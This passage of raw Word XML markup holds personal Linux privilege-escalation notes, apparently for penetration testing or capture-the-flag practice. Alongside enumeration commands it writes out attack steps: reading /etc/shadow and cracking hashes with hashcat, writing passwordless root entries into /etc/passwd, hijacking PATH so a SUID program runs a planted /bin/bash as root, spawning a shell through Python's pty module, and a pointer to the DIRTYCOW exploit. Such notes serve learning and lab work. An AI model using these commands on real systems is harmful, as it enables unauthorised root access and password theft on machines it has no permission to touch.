        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00342A2E">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Try the highest possible privilege escalate first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAF309A" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0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cat /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE84522" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7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an the passwords be read/bruteforced? If yes, use hashcat!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB1043D" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0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ls -al /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FC7EAA" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7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s it possible to write to this file? If so, overwrite root and set an empty password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B0FC42" w14:textId="77777777" w:rsidR="004C1FCB" w:rsidRDefault="007351F7" w:rsidP="004C1FCB">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/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cho ‘pcso::0:0::/home/pcso:/bin/sh' &gt;&gt; /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603B4182" w14:textId="5ECA48C4" w:rsidR="004C1FCB" w:rsidRPr="004C1FCB" w:rsidRDefault="004C1FCB" w:rsidP="004C1FCB">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1FC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echo root::0:0:root:/root:/bin/bash &gt; /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0975C6" w14:textId="5C34339F" w:rsidR="004C1FCB" w:rsidRPr="00E06C11" w:rsidRDefault="004C1FCB" w:rsidP="004C1FCB">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/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n type su (you are root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAFF665" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0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id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8C67DE" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7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s id &gt;1000? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CEF8D9" w14:textId="16D91BFC" w:rsidR="00DC5746" w:rsidRPr="007975DD" w:rsidRDefault="007351F7" w:rsidP="00DC5746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ry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo su </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- you might be in the sudoers file!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022F2433" w14:textId="2B353ADD" w:rsidR="00DC5746" w:rsidRDefault="00DC5746" w:rsidP="007975DD">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="341FF37F" w14:textId="3C95D4A6" w:rsidR="007975DD" w:rsidRDefault="007975DD" w:rsidP="007975DD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr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f you are a sudoer </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0BC842" w14:textId="07E2D638" w:rsidR="003C6984" w:rsidRPr="007975DD" w:rsidRDefault="003C6984" w:rsidP="003C6984">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr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Can use sudo su to try can switch user. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D6A611" w14:textId="77777777" w:rsidR="007975DD" w:rsidRDefault="007975DD" w:rsidP="00DC5746">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58F6F68A" w14:textId="1CB66B97" w:rsidR="00FD5114" w:rsidRDefault="007901F6" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0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Enum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7075B0C1" w14:textId="08567066" w:rsidR="00FD5114" w:rsidRPr="009F2CCD" w:rsidRDefault="00FD5114" w:rsidP="00FD5114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9F2CCD">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Uname -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7722A76F" w14:textId="08DEEAB7" w:rsidR="00FD5114" w:rsidRDefault="00FD5114" w:rsidP="00FD5114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9F2CCD">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Uname -i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5CF7B6" w14:textId="77777777" w:rsidR="00B971AC" w:rsidRDefault="00B971AC" w:rsidP="00B971AC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Uname -m</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADF2A0C" w14:textId="5ECF7BF2" w:rsidR="00B971AC" w:rsidRPr="00B971AC" w:rsidRDefault="00B971AC" w:rsidP="00B971A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color w:val="555555"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        </w:rPr>
        <w:t>It shows if your system is running 32-bit (i686 or i386) or 64-bit(x86_64).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA6320C" w14:textId="5B85353A" w:rsidR="00910B70" w:rsidRPr="009F2CCD" w:rsidRDefault="007901F6" w:rsidP="00FD5114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9F2CCD">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8E4771" w14:textId="77777777" w:rsidR="007901F6" w:rsidRPr="009F2CCD" w:rsidRDefault="007901F6" w:rsidP="007901F6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9F2CCD">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4268E0" w14:textId="2FE92C3D" w:rsidR="007901F6" w:rsidRPr="007901F6" w:rsidRDefault="007901F6" w:rsidP="007901F6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7901F6">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cat /etc/*-release</w:t>
      </w:r>
      <w:r w:rsidR="00FC52F5">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Version and type)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4583508E" w14:textId="08F5930E" w:rsidR="00BB10F1" w:rsidRPr="009F2CCD" w:rsidRDefault="007901F6" w:rsidP="00BB10F1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9F2CCD">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/etc/ssh/sshd_config</w:t>
      </w:r>
      <w:r w:rsidR="00FC52F5">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  (SSH configuration) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BEEE02" w14:textId="1892EC09" w:rsidR="00BB10F1" w:rsidRDefault="00BB10F1" w:rsidP="00BB10F1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9F2CCD">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ps aux</w:t>
      </w:r>
      <w:r w:rsidR="00FC52F5">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC52F5">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00FC52F5">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007975DD">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r w:rsidR="00FC52F5">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(Which services has which user privilege)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222DB7D4" w14:textId="7C856566" w:rsidR="007975DD" w:rsidRPr="009F2CCD" w:rsidRDefault="007975DD" w:rsidP="00BB10F1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7975DD">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ps aux | grep root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   (Which services is running on root privilege)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8C9378" w14:textId="46327EA6" w:rsidR="00B971AC" w:rsidRPr="001F3F01" w:rsidRDefault="00BB10F1" w:rsidP="001F3F01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9F2CCD">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>netstat -antup</w:t>
      </w:r>
      <w:r w:rsidR="00FC52F5">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007975DD">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidR="00FC52F5">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Communication) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608D5441" w14:textId="560F77E1" w:rsidR="00FC52F5" w:rsidRDefault="007D0B4B" w:rsidP="00FC52F5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7D0B4B">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dpkg -l</w:t>
      </w:r>
      <w:r w:rsidR="00F924C7">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F924C7">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>(Installed version and dates of application)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD1B624" w14:textId="5C94632D" w:rsidR="00FC52F5" w:rsidRDefault="00FC52F5" w:rsidP="00FC52F5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hecking which services is running as root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3202844C" w14:textId="28E622CC" w:rsidR="00FC52F5" w:rsidRPr="00FC52F5" w:rsidRDefault="00FC52F5" w:rsidP="00FC52F5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FC52F5">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ps aux | grep root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721F80CE" w14:textId="259A26E3" w:rsidR="00FC52F5" w:rsidRPr="007D0B4B" w:rsidRDefault="00FC52F5" w:rsidP="00FC52F5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FC52F5">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ps -ef | grep root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7236CF" w14:textId="4144E687" w:rsidR="004C3096" w:rsidRDefault="004C3096" w:rsidP="007D0B4B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Finding the databse information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44431ABC" w14:textId="4120EF1E" w:rsidR="007D0B4B" w:rsidRDefault="007D0B4B" w:rsidP="004C3096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7D0B4B">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -name "config.environment.php" 2&gt;/dev/null (find the database file </w:t>
      </w:r>
      <w:r w:rsidRPr="007D0B4B">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>location)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27822E96" w14:textId="727E9BD4" w:rsidR="006B002F" w:rsidRDefault="006B002F" w:rsidP="006B002F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="3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f cannot find an look at config.example.php file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0BA46F" w14:textId="670366BC" w:rsidR="007D0B4B" w:rsidRDefault="007D0B4B" w:rsidP="005C3FDF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7D0B4B">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>www-data@alpha:/etc/apache2$ grep -Ri DocumentRoot(show all the web root's locations)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088926F2" w14:textId="157E45B2" w:rsidR="008D26C7" w:rsidRDefault="008D26C7" w:rsidP="005C3FDF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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28446D18" wp14:editId="0DDEA272">
            <wp:extent cx="3750319" cy="558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8708" cy="5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169E" w14:textId="629E28C7" w:rsidR="005C3FDF" w:rsidRDefault="005C3FDF" w:rsidP="005C3FDF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5C3FDF">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>grep -R '$bigtree\["config"\]\["db"\]' .</w:t>
      </w:r>
      <w:r w:rsidR="00694B65">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> // not fix can be changed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D85609B" w14:textId="484BCB15" w:rsidR="007D0B4B" w:rsidRPr="0028469E" w:rsidRDefault="004C3096" w:rsidP="0028469E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 w:rsidRPr="004C3096">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>find . -iname '*config*'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A45A74" w14:textId="77777777" w:rsidR="007D0B4B" w:rsidRDefault="007D0B4B" w:rsidP="007D0B4B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="264E8A11" w14:textId="0CCABE66" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0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ps -aux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E136E3E" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7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hat are the processes running?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A78FF9D" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0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bookmarkStart w:id="17" w:name="_Hlk527319812"/>
      <w:bookmarkStart w:id="18" w:name="OLE_LINK7"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>find / -perm -g=s -o -perm -u=s -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="17"/>
    <w:bookmarkEnd w:id="18"/>
    <w:p w14:paraId="4EF301A0" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7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hecks for files set with the suid bit- programs that run as root but can be started by anyone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B923DED" w14:textId="0ADBADC2" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7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Use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">strings &lt;program name&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>to see what the program did</w:t>
      </w:r>
      <w:r w:rsidR="007214D6">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ****</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145E8F08" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7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heck for commands running without full file path [scp, ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA1E8E5" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7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Add tmp to PATH, create a file with bash/sh and call command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00705B82" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7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export PATH=”/tmp”:$PATH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(adds it to the start so linux checks tmp first)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7173342F" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7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(in /tmp) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">echo “/bin/bash” &gt; scp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(or /bin/sh) (here scp is the command not being run with full path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA5E47C" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7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chmod +x scp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563B66B3" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2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&lt;program name&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(run it. It will find your version of “scp” first, and run it as root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDFD265" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0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find / -writable -type d 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08973FB7" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7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an’t write to /tmp? Use ^ command to find writable directories in the filesystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D740CD9" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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echo "import pty; pty.spawn('/bin/bash')" &gt; asdf.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581DB19B" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7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Getting the error “su must be run from terminal” when trying to run sudo su? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063359CF" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="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Run the above command, and then call </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">python asdf.py </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>to get a terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B090D26" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>If your unix distribution is BSD- then the commands are not the same as linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254A586D" w14:textId="3F8F36AC" w:rsidR="007351F7" w:rsidRPr="009B6203" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">fetch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">is the equivalent of wget </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743142AB" w14:textId="77777777" w:rsidR="009B6203" w:rsidRDefault="009B6203" w:rsidP="009B6203">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="302F1D8C" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F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DIRTYCOW</w:t>
      </w:r>
    </w:p>
